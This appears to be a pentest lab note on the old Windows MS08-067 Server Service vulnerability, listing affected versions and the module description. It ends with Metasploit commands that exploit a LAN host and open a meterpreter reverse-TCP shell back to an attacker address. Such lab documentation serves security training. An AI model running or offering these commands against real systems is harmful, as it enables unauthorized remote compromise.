MS08-067 : Microsoft Server Service Relative Path Stack Corruption

Timeline :

Milw0rm PoC provided by stephen lawler the 2008-10-23
Metasploit PoC provided by hdm the 2009-10-28
Microsoft patch “KB958644” provided the 2008-10-23

PoC provided by :

Brett Moore
hdm

Reference(s) :

CVE-2008-4250
MS08-067

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 & SP3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP1 & SP2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition SP2
Windows Vista and Windows Vista SP1
Windows Vista x64 Edition and Windows Vista x64 Edition SP1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems

Tested on Windows XP SP3 before KB958644

Description :

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

Commands :

nmap 192.168.178.41
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig